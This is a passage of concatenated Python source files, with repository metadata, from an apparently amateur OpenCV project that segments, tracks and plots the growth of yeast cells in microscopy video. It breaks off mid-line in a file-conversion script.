"text": "import cv2\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.cellInstance import cellInstance\n\ndef conectedCompontents(maskImg,floImg):\n conectedCompontents, hirearchy = cv2.findContours(maskImg, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floImg)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n return(cellInstanses)\n"
},
{
"alpha_fraction": 0.7299578189849854,
"alphanum_fraction": 0.7362869381904602,
"avg_line_length": 38.5,
"blob_id": "e20db360a36e965c5850b35560a71a455c7e7867",
"content_id": "0e29bca900d034aa39b5cc2990e56c6e1d2543e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 12,
"path": "/Analysis/AddBudsToMother.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Anlysis.getDevisionFrameNum import getDevisionFrameNum\n\n#Pre1: Mother Tracked CellTrackel\n#Pre2: list Doughters\ndef addBudsToMother(mother,doughters):\n sizeTrace = mother.getSizesTraceFromBegining()\n for dought in doughters:\n deviNum = getDevisionFrameNum(dought)\n dughtSzTrc = dought.getSizesTraceFromBegining()[0:deviNum]\n for i in range(min(len(sizeTrace),len(dughtSzTrc))):\n sizeTrace[i] += dughtSzTrc[i]\n return(sizeTrace)\n"
},
{
"alpha_fraction": 0.8525252342224121,
"alphanum_fraction": 0.8545454740524292,
"avg_line_length": 28.117647171020508,
"blob_id": "4b3f1ae0d1d479581366c5a2c88fba0cb765caf5",
"content_id": "5980013f821fe26b79147cfaaea479b8f93bd6f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/main.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#Yeast Track Main\nimport cv2\n#from UserInterface.videoClass import Video\nfrom UserInterface.LoadData.LoadData import getVideo\nfrom UserInterface.LoadData.LoadtifFile import imortTiftoVideoNew\nfrom UserInterface.Controls import Controls\nfrom UserInterface.LoadData.ImportThreeZoomLevel import loadThreeZoomLevel\nfrom UserInterface.LoadData.LoadChannels import loadChannels\n\n#video = loadThreeZoomLevel()\nvideo = loadChannels()\n\nvideo.runTracking()\n\ncntrl = Controls(video)\n\ncntrl.startControls()\n"
},
{
"alpha_fraction": 0.6702127456665039,
"alphanum_fraction": 0.6852836608886719,
"avg_line_length": 24.066667556762695,
"blob_id": "7355772dbfc4490543142dc8b2fecdf5071256af",
"content_id": "fa328815ea0ee521a5e6d148a79bb0c9af40cf75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 45,
"path": "/UserInterface/rescaleImageToUser.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\n#Scale image For Visual Apropriate Size\n#Pre: image\n#Ret: Scaled image\ndef rescaleImageToUser(img):\n prop = getScaleProprtion(img.shape)\n szX = int(img.shape[1]/prop)\n szY = int(img.shape[0]/prop)\n dim = (szX, szY)\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n return(img)\n\n#Pre1: Centroid\n#Pre2: frame\n#Ret: REscaled cetroid\ndef rescalePosToUser(centroid,imgShape):\n prop = getScaleProprtion(imgShape)\n (centerX,centerY) = centroid\n #print(centroid)\n centerX = int(centerX/prop)\n centerY = int(centerY/prop)\n centroid = (centerX,centerY)\n #print(centroid)\n return(centroid)\n\ndef rescaleCounur(contour,imgShape):\n scaledCnt = []\n for cntPt in contour:\n cntPt = cntPt[0]\n cntPt = rescalePosToUser(cntPt,imgShape)\n scaledCnt.append(cntPt)\n return(scaledCnt)\n\n\n#Gives Scale proportion\n#Pre: image shape\n#Ret: Proportion to scale to get good visual\ndef getScaleProprtion(imgSape):\n userSzX = 1200\n userSzY = 800\n xSzProp = imgSape[1]/userSzX\n ySzProp = imgSape[0]/userSzY\n prop = max(xSzProp,ySzProp)\n return(prop)\n"
},
{
"alpha_fraction": 0.670536994934082,
"alphanum_fraction": 0.6966618299484253,
"avg_line_length": 40.75757598876953,
"blob_id": "74dbf69d2966d711b8abd5fcfbe873c4e1afcab6",
"content_id": "912d33ea9ad9e48a4eb5f6167c56a5aed34007da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 33,
"path": "/UserInterface/getIDImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom UserInterface.rescaleImageToUser import rescaleImageToUser\nfrom UserInterface.rescaleImageToUser import rescalePosToUser\nfrom UserInterface.rescaleImageToUser import rescaleCounur\nfrom Tracking.GetPositionFromContour import getPositionFromContour\n\n#Pre1: list of objects\n#Pre2: frame\ndef getIDImage(listOfObjects,frame):\n szX = frame.xSz\n szY = frame.ySz\n numCol = 3\n idImg = np.zeros((szX,szY, numCol), np.uint8)\n idImg = rescaleImageToUser(idImg)\n #Loop over the tracked objects\n for trackedCell in listOfObjects:\n #Draw both the ID of the object and the centroid\n idText = \"ID \" + str(trackedCell.getCellID())\n (centerX,centerY) = trackedCell.getCentroid()\n #contour = trackedCell.getContour()\n #contour = rescaleCounur(contour,[szX,szY])\n #(centerX,centerY) = getPositionFromContour(contour)\n (centerX,centerY) = rescalePosToUser((centerX,centerY),frame.getOptImage().shape)\n #Put Text and Cetroid\n #print(idText)\n #print((centerX,centerY))\n cv2.putText(idImg, idText, (centerX-10,centerY-25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(idImg, (centerX,centerY), 10, (0, 255, 0), -1)\n #cv2.circle(idImg, (centerX,centerY), 1, (0, 255, 0), -1)\n #idImg = rescaleImageToUser(idImg)\n #Return\n return(idImg)\n"
},
{
"alpha_fraction": 0.7185025215148926,
"alphanum_fraction": 0.7271418571472168,
"avg_line_length": 26.235294342041016,
"blob_id": "ae83c9c3fa08fc0427b0a39a8d1812d719aa7200",
"content_id": "b70fe4f074f85f1c70b7c56336304b172fc23569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2778,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 102,
"path": "/Tracking/TrackedCell.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom Segmentation.cellInstance import cellInstance\n\nclass TrackedCell():\n\n\tdef __init__(self, cellInst = -1, cellID = -1,detectionFrameNum = -1):\n\t\tself.cellTrace = []\n\t\tself.cellTrace.append(cellInst)\n\t\tself.cellID = cellID\n\t\tself.detectionFrameNum = detectionFrameNum\n\t\tself.motherID = None\n\t\tself.relatabelityFactor = 0\n\n\tdef update(self ,cellInst = -1):\n\t\t\tif(cellInst == -1):\n\t\t\t\tcellInst = self.cellTrace[-1]\n\t\t\t\tself.cellTrace.append(cellInst)\n\t\t\tself.cellTrace.append(cellInst)\n\n\tdef setMotherCell(self,motherID,relatabelityFactor = -1):\n\t\tself.motherID = motherID\n\t\tself.relatabelityFactor = relatabelityFactor\n\n\tdef getMotherCell(self):\n\t\treturn(self.motherID)\n\n\tdef getRelatabelityFactor(self):\n\t\treturn(self.relatabelityFactor)\n\n\tdef getDetectionFrameNum(self):\n\t\treturn(self.detectionFrameNum)\n\n\tdef getContour(self,pos = -1):\n\t\tif(pos > 0 and pos > self.detectionFrameNum):\n\t\t\tpos = pos - self.detectionFrameNum\n\n\t\t#If pos < detectionFrameNum here means want pos before cell was detected give first instance\n\t\tif(pos < self.detectionFrameNum and pos > 0):\n\t\t\t#return Early\n\t\t\treturn(self.cellTrace[0].getContour())\n\n\t\t#If pos >= len(cellTrace) want position of cell after it have disaperd\n\t\tif(pos >= len(self.cellTrace)):\n\t\t\t#Return earlt latest instace\n\t\t\treturn(self.cellTrace[-1].getContour())\n\n\t\treturn(self.cellTrace[pos].getContour())\n\n\tdef getCellID(self):\n\t\treturn(self.cellID)\n\n\t#Ret No Arg: latest registered poistion\n #Ret Arg: position at that frame number\n\tdef getCentroid(self, pos = -1):\n\t\tif(pos > 0 and pos > self.detectionFrameNum):\n\t\t\tpos = pos - self.detectionFrameNum\n\n\t\t#If pos < detectionFrameNum here means want pos before cell was detected give first instance\n\t\tif(pos < self.detectionFrameNum and pos > 0):\n\t\t\t#return Early\n\t\t\treturn(self.cellTrace[0].getPosition())\n\n\t\t#If pos >= len(cellTrace) want position of cell after it have disaperd\n\t\tif(pos >= len(self.cellTrace)):\n\t\t\t#Return earlt latest instace\n\t\t\treturn(self.cellTrace[-1].getPosition())\n\n\t\treturn(self.cellTrace[pos].getPosition())\n\n\tdef getSizesTrace(self):\n\t\tsizeTrace = []\n\t\tfor cellInst in self.cellTrace:\n\t\t\tsizeTrace.append(cellInst.getSize())\n\t\treturn(sizeTrace)\n\n\tdef getSizesTraceFromBegining(self):\n\t\tsizeTrace = []\n\t\tfor i in range(self.detectionFrameNum):\n\t\t\tsizeTrace.append(0)\n\t\tfor cellInst in self.cellTrace:\n\t\t\tsizeTrace.append(cellInst.getSize())\n\t\treturn(sizeTrace)\n\n\tdef getWhi5Trace(self):\n\n\t\twhi5Trace = []\n\n\t\tfor cellInst in self.cellTrace:\n\t\t\twhi5Trace.append(cellInst.getWHI5Activity())\n\n\t\treturn(whi5Trace)\n\n\tdef getPosTrace(self):\n\n\t\txPosTrace = []\n\t\tyPosTrace = []\n\t\tfor cellInst in self.cellTrace:\n\t\t\t(xPos, yPos) = cellInst.getPosition()\n\t\t\txPosTrace.append(xPos)\n\t\t\tyPosTrace.append(yPos)\n\n\t\treturn(xPosTrace,yPosTrace)\n"
},
{
"alpha_fraction": 0.6690460443496704,
"alphanum_fraction": 0.6765087842941284,
"avg_line_length": 34.425289154052734,
"blob_id": "bf9a512751e338272ae8fed29c23dd1da3785803",
"content_id": "69b72e6288ff4666334f173a608fe60216572307",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3082,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 87,
"path": "/Analysis/plotSize.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\n#from Anlysis.plotSize import plotTrackCellSizeBudToMother\nfrom Anlysis.FitExponential import fitExponential\nfrom Anlysis.FitExponential import plotDataWithExpo\nfrom Anlysis.AddBudsToMother import addBudsToMother\nfrom Anlysis.PlotTrackedCellsSize import plotTrackedCellsSize\n\n#Pre1: List of number with cells to be ploted\n#Pre2:\ndef plotTrackCellSizeBudToMother(cellToPlot, trackedCells):\n szTrc = []\n #add to Mother trace\n #return mother trace\n for mother in trackedCells:\n szTrc = []\n cellID = mother.getCellID()\n #find Doughter cells\n if any(cellID == i for i in cellToPlot):\n #Get doughters\n doughters = findDoughetCells(mother, trackedCells)\n #doughters = []\n szTrc = addBudsToMother(mother,doughters)\n plotTrackedCellsSize(doughters)\n\n #plt.show()\n plt.plot(range(len(szTrc)),szTrc, label=\"ID \" + str(cellID))\n plt.ylabel('Growth Curves')\n plt.xlabel('Time')\n plt.title(\"Size\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n\n\ndef addBudToMother(mother,trackedCells,idOfBuds):\n motherCellTrace = mother.getSizesTrace()\n for trCell in trackedCells:\n cellID = trCell.getCellID()\n if any(cellID == i for i in idOfBuds):\n motherCellTrace = addBudtoMother(mother,trCell)\n return(motherCellTrace)\n\ndef findDoughetCells(mother, trackedCells):\n motherID = mother.getCellID()\n doughters = []\n for trCell in trackedCells:\n if motherID == trCell.getMotherCell():\n doughters.append(trCell)\n return(doughters)\n\n\ndef addBudtoMotherOOOLD(motherTrace,doughter):\n deviInst = getDevisionInst(doughter)\n deviInst = 157\n doughterSizeTrace = doughter.getSizesTrace()\n doughterDetectFrame = 157 - len(doughterSizeTrace)\n startIt = doughterDetectFrame-(157-len(motherTrace))\n #print(startIt)\n for dSzI in range(len(doughterSizeTrace)):\n dSz = doughterSizeTrace[dSzI]\n motherTrace[startIt+dSzI] = motherTrace[startIt+dSzI] + dSz\n #param = fitExponential(motherTrace[(deviInst-len(doughterSizeTrace)):deviInst])\n return(motherTrace)\n\ndef addBudtoMother(motherTrace,doughter):\n deviInst = getDevisionInst(doughter)\n doughterSizeTrace = doughter.getSizesTrace()[:deviInst]\n for dSzI in range(len(doughterSizeTrace)):\n dSz = doughterSizeTrace[-dSzI]\n motherTrace[deviInst-dSzI] = motherTrace[deviInst-dSzI] + dSz\n #param = fitExponential(motherTrace[(deviInst-len(doughterSizeTrace)):deviInst])\n return(motherTrace)\n\n#Returnsfirst Whi5 activation Index\ndef getDevisionInst(doughter):\n thresh = 0.30\n cellWhi5Trace = doughter.getWhi5Trace()\n index = 0\n for whi5 in cellWhi5Trace:\n index = index + 1\n if whi5 > thresh:\n index = index+doughter.getDetectionFrameNum()\n colorsd = 'C1'\n plt.axvline(x=index, color=colorsd, linestyle='--')\n break\n return(index)\n"
},
{
"alpha_fraction": 0.6584615111351013,
"alphanum_fraction": 0.670769214630127,
"avg_line_length": 24,
"blob_id": "2e4d2f77102ebb233a55ab6a6a1160f93a83a1ac",
"content_id": "0b08cbf6501b080a60f103ba1a766557950369ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 13,
"path": "/UserInterface/LoadData/getCropCoordinates.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "posList = []\n\ndef onMouse(event, x, y, flags, param):\n global posList\n if event == cv2.EVENT_LBUTTONDOWN:\n posList.append((x, y))\n\ndef getCropCoordinates(mats):\n #Get last image\n #Import Image Crop\n cv2.imshow(\"SelectCropPos\",mats[-2])\n cv2.setMouseCallback(\"SelectCropPos\",onMouse)\n print(posList)\n"
},
{
"alpha_fraction": 0.7227332592010498,
"alphanum_fraction": 0.7389400005340576,
"avg_line_length": 33.07462692260742,
"blob_id": "4d2b22554aa6518b2ee2e475e1b09b512847cf34",
"content_id": "75dfd2c97f4422c9f9964fee1aee4886445dc2fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2283,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 67,
"path": "/Segmentation/OstuBinarizartion.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\nfrom Segmentation.getThreshold import getTherholdImage\nfrom Segmentation.Rescaling import rescaleImage\nfrom Segmentation.ConvexHull import convexHull\n\n\n#OstuBinarization\n#Pre: Frame As defined in main\n#Ret: CellInstances in\ndef OtsuBinarization(frame):\n optImg = frame.getOptImage()\n floImg = frame.getFloImage()\n optImg = rescaleImage(optImg,10)\n #floImg = rescaleImage(floImg,10)\n maskImg = getMaskFrame(optImg)\n maskImg = rescaleImage(maskImg,0.1)\n cellInstanses = conectedCompontents(maskImg,floImg)\n cellInstanses = filterDetections(cellInstanses)\n return(cellInstanses)\n\n#Pre: VideoFrame\n#Ret: White on black maskFrame\ndef getMaskFrame(img):\n img = otsuThreshold(img)\n maskImg = convexHull(img)\n return(maskImg)\n\n\"\"\"\n#Pre: takes An binary image\n#Ret: Returns Image with conexHull filled of all wite separated images\ndef convexHull(img):\n # Finding contours for the thresholded image\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n #Create an empty black image\n img = np.zeros((img.shape[0], img.shape[1]), np.uint8)\n\n for i in range(len(contours)):\n img = cv2.fillPoly(img, pts =[hull[i]], color=(255))\n\n return(img)\n\"\"\"\n\ndef conectedCompontents(img,floFrame):\n conectedCompontents, hirearchy = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floFrame)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n return(cellInstanses)\n\ndef otsuThreshold(img):\n #apply thresholding\n gotFrame, thresh = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n return(thresh)\n"
},
{
"alpha_fraction": 0.6689189076423645,
"alphanum_fraction": 0.6869369149208069,
"avg_line_length": 23.66666603088379,
"blob_id": "098d21b2bf410a19cad3ae801183e0fb5da134b9",
"content_id": "e65f2cdeb715d052fc089801d7049a69fca64d07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 18,
"path": "/UserInterface/IncreasIntesity.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\n#Pre: frame\n#ret: Frame with higer intesity\ndef incFloIntens(img,intens):\n intens = int(intens/10)\n #Check number of colors\n numCol = 3\n\n intensImg = np.zeros((img.shape[0], img.shape[1], numCol), np.uint8)\n for i in range(intens):\n intensImg = cv2.add(intensImg,img)\n return(intensImg)\n\n#Merge\ndef increasIntens(img,currentBlend):\n img = incFloIntens(img,currentBlend)\n return(img)\n"
},
{
"alpha_fraction": 0.6570605039596558,
"alphanum_fraction": 0.6743515729904175,
"avg_line_length": 23.785715103149414,
"blob_id": "1166a1fc96de9f14f672c5b464562b9b948ce65a",
"content_id": "b8cab3ece8f2d1dff837a7ef0fb31b6eb516ab54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 14,
"path": "/Segmentation/FilterDetection.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre: detections\n#Ret: Filtered Detections\ndef filterDetections(cellInstances):\n maxSize = 210\n minSize = 15\n filterdList = []\n for cellInst in cellInstances:\n size = cellInst.getSize()\n if size < maxSize and size > minSize:\n filterdList.append(cellInst)\n return(filterdList)\n"
},
{
"alpha_fraction": 0.7105492353439331,
"alphanum_fraction": 0.7291485071182251,
"avg_line_length": 30.56880760192871,
"blob_id": "58ee9342ef5ac1442fadb6d2ecc545df256f39ee",
"content_id": "6d7d95847c74598f0965f6e7934b0a1830a49588",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3441,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 109,
"path": "/Segmentation/ThersholdingSegmentation.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Segmentation.Preprocessing import preprocess\nfrom Segmentation.Preprocessing import preprocessFloImg\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\nfrom Segmentation.ConvexHull import convexHull\nfrom Segmentation.ConectedComponents import conectedCompontents\n#Pre: Frame\n#Ret: CellInstances\ndef segementThreshold(frame):\n #Get Image\n optImg = frame.getOptImage()\n floImg = frame.getFloImage()\n #Apply Preprocessing\n optImg = preprocess(optImg)\n floImg = preprocessFloImg(floImg)\n #Segment Edges with thresholding\n binImg = thesholdEdges(optImg)\n #Erode Here To avoid conecting cells??\n\n\n #cv2.imshow(\"binimgEdges\",binImg)\n\n binImg = convexHull(binImg)\n\n #Threshold floImg\n binImgFlo = thesholdFlorecense(floImg)\n\n #grayThr = thresholdGray(optImg)\n\n #Intersection of Thresholds\n binImg = cv2.bitwise_and(binImg, binImgFlo)\n\n #cv2.imshow(\"binimgFinal\",binImg)\n #cv2.waitKey(0)\n cellInstanses= conectedCompontents(binImg,floImg)\n cellInstanses = filterDetections(cellInstanses)\n return(cellInstanses)\n\n#Pre: image of cells with clear edges\n#Ret: Binary image Edges White not edge black\ndef thesholdEdges(img):\n #Threshold values\n thrLow = 85\n thrHigh = 255\n #cv2.imshow(\"img\",img)\n gotImg, thresh = cv2.threshold(img,thrLow,thrHigh,cv2.THRESH_BINARY)\n return(thresh)\n\ndef thresholdGray(img):\n #Threshold\n thrLow = 65\n thrHigh = 255\n gotImg, thresh = cv2.threshold(img,thrLow,thrHigh,cv2.THRESH_BINARY)\n kernel = np.ones((2,2), np.uint8)\n thresh = cv2.erode(thresh, kernel, iterations=1)\n cv2.imshow(\"img\",thresh)\n cv2.waitKey(0)\n\n #Remove Largest\n #Find largest contour in intermediate image\n cnts, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n cnt = max(cnts, key=cv2.contourArea)\n #Fill largest with Black\n cv2.drawContours(thresh, [cnt], -1, 0, cv2.FILLED)\n\n return(thresh)\n\ndef thesholdFlorecense(img):\n #Threshold values\n thrLow = 20\n thrHigh = 255\n #cv2.imshow(\"img\",img)\n gotImg, thresh = cv2.threshold(img,thrLow,thrHigh,cv2.THRESH_BINARY)\n return(thresh)\n\n#Pre: Binary Image\n#Ret: Binary img with convex hull\ndef cellInstasConvexHull(img,floImg):\n # Finding contours for the thresholded image\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n\n cellInstanses = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull = (cv2.convexHull(contours[i], False))\n whi5Activ = getWHI5Activity(hull,floImg)\n cellInstans = cellInstance(hull,whi5Activ)\n cellInstanses.append(cellInstans)\n\n return(cellInstanses)\n\n\ndef conectedCompontents(binImg,floImg):\n\n conectedCompontents, hirearchy = cv2.findContours(binImg, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floImg)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n\n return(cellInstanses)\n"
},
{
"alpha_fraction": 0.7032755017280579,
"alphanum_fraction": 0.7649325728416443,
"avg_line_length": 33.599998474121094,
"blob_id": "94d918fa7e32f4fd7030c5a55fb88d8f761edd99",
"content_id": "63861e7b7ec73e714cabb27841914b400e811c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 15,
"path": "/UserInterface/LoadData/ImportThreeZoomLevel.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from UserInterface.videoClass import Video\nimport cv2\n\ndef loadThreeZoomLevel():\n zom0Path = \"VideoData/tileScan2/tileScan2OptZ0.avi\"\n zom1Path = \"VideoData/tileScan2/tileScan2OptZ1.avi\"\n zom2Path = \"VideoData/tileScan2/tileScan2OptZ2.avi\"\n flo1Path = \"VideoData/tileScan2/tileScan2Flo.avi\"\n\n zom0Cap = cv2.VideoCapture(zom0Path)\n zom1Cap = cv2.VideoCapture(zom1Path)\n zom2Cap = cv2.VideoCapture(zom2Path)\n flo1Cap = cv2.VideoCapture(flo1Path)\n\n return Video(zom0Cap,zom1Cap,zom2Cap,flo1Cap)\n"
},
{
"alpha_fraction": 0.6873469352722168,
"alphanum_fraction": 0.7248979806900024,
"avg_line_length": 33.02777862548828,
"blob_id": "89a84f1cdeed0b1dd266052e547c02b97a80691d",
"content_id": "7fb03040f9ca49b80caefa77c502eceac66b342f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1225,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 36,
"path": "/Segmentation/LaplacianGausian.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom Segmentation.cellInstance import cellInstance\nimport numpy as np\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\n#from frameClass import rescale_frame\n\n#LAP MEthoth for segmentation of yeast cells.\ndef laplacianGausian(frame):\n optFrame = frame.getOptChan()\n floFrame = frame.getFloChan()\n kernelSize = 3;\n scale = 1;\n delta = 0;\n ddepth = cv2.CV_16S;\n gaussian = cv2.GaussianBlur(optFrame, (3, 3), 0)\n gaussianShow = rescale_frame(gaussian,1000)\n cv2.imshow(\"gaussian\", gaussianShow)\n cv2.waitKey(0)\n #cv2.imwrite(\"gaussian\", gaussianShow)\n gaussian = cv2.cvtColor(gaussian, cv2.COLOR_BGR2GRAY)\n laplacian = cv2.Laplacian(gaussian, ddepth, ksize=kernelSize)\n laplacian = cv2.convertScaleAbs(laplacian)\n laplacianShow = rescale_frame(laplacian,1000)\n cv2.imshow(\"Laplacian\", laplacianShow)\n cv2.waitKey(0)\n #cv2.imwrite(\"Laplacian\", laplacianShow)\n\n return([])\n\n\ndef rescale_frame(frame, percent=75):\n width = int(frame.shape[1] * percent/100)\n height = int(frame.shape[0] * percent/100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)\n"
},
{
"alpha_fraction": 0.6062802076339722,
"alphanum_fraction": 0.6239935755729675,
"avg_line_length": 26.600000381469727,
"blob_id": "ad032f499575e8531713c63037932839654fc2cd",
"content_id": "186d850f58bb607113b6f50240260eafa46cdf66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1242,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 45,
"path": "/UserInterface/LoadData/LoadtifFile.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from UserInterface.videoClass import Video\nimport cv2\n\ndef imortTiftoVideo(filePath):\n numChan = 2\n numZoomLevles = 4\n etval, mats = cv2.imreadmulti(filePath)\n #8 images for each frame\n #TODO Generalize\n allFrames = []\n for matIndex in range(0,len(mats),8):\n frame = []\n optChan = []\n #optChan.append(mats[matIndex])\n #optChan.append(mats[matIndex+1])\n #optChan.append(mats[matIndex+2])\n optChan.append(mats[matIndex+3])\n floChan = []\n #floChan.append(mats[matIndex+4])\n floChan.append(mats[matIndex+5])\n #floChan.append(mats[matIndex+6])\n #floChan.append(mats[matIndex+7])\n frame.append(optChan)\n frame.append(floChan)\n allFrames.append(frame)\n video = Video(allFrames)\n del mats\n return(video)\n\ndef imortTiftoVideoNew(filePath):\n numChan = 2\n numZoomLevles = 4\n etval, mats = cv2.imreadmulti(filePath)\n #8 images for each frame\n #TODO Generalize\n allFrames = []\n for matIndex in range(0,len(mats)-1,2):\n frame = []\n frame.append(mats[matIndex])\n frame.append(mats[matIndex+1])\n allFrames.append(frame)\n\n video = Video(allFrames)\n del mats\n return(video)\n"
},
{
"alpha_fraction": 0.607120931148529,
"alphanum_fraction": 0.6193984150886536,
"avg_line_length": 28.089284896850586,
"blob_id": "caba8404d3674414da63d38e8ec8ff4008e4eb82",
"content_id": "89a159e7e2f935036827b4dea4f0ab3626bd8b96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1629,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 56,
"path": "/UserInterface/LoadData/ConvertLiftoTif.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import os\n\ndef convertLifToTif(inPath, OutPath):\n cleanWorking = \"rm ./VideoData/WorkingData/*\"\n os.system(cleanWorking)\n\n series = 3\n channel = 1\n zoomLevel = 3\n filePath = inPath\n #Cropping Coordinates\n ulx,uly = (0,0)\n drx,dry = (512,512)\n\n #Convering -lif file with bioformats\n #Using nolookup option\n comand = \"./bftools/bfconvert -nolookup\"\n seriesFlag = \" -series \" + str(series)\n channelFlag = \" -channel \" + str(channel)\n zoomFlag = \" -z \" + str(zoomLevel)\n cropFlag = \" -crop \"+str(ulx)+\",\"+str(uly)+\",\"+str(drx)+\",\"+str(dry)\n filePath = \" \" + filePath\n tifPath = \" \" + OutPath\n\n #cmd = comand + seriesFlag + cropFlag + channelFlag + zoomFlag + filePath + tifPath\n cmd = comand + seriesFlag + cropFlag + filePath + tifPath\n\n os.system(cmd)\n\n\ndef convertLifToTifNew(inPath, OutPath):\n cleanWorking = \"rm ./VideoData/WorkingData/*\"\n os.system(cleanWorking)\n\n series = 3\n channel = 1\n zoomLevel = 3\n filePath = inPath\n #Cropping Coordinates\n ulx,uly = (0,0)\n drx,dry = (10,10)\n\n #Convering -lif file with bioformats\n #Using nolookup option\n comand = \"./bftools/bfconvert -nolookup\"\n seriesFlag = \" -series \" + str(series)\n channelFlag = \" -channel \" + str(channel)\n zoomFlag = \" -z \" + str(zoomLevel)\n cropFlag = \" -crop \"+str(ulx)+\",\"+str(uly)+\",\"+str(drx)+\",\"+str(dry)\n filePath = \" \" + filePath\n tifPath = \" \" + OutPath\n\n #cmd = comand + seriesFlag + cropFlag + channelFlag + zoomFlag + filePath + tifPath\n cmd = comand + 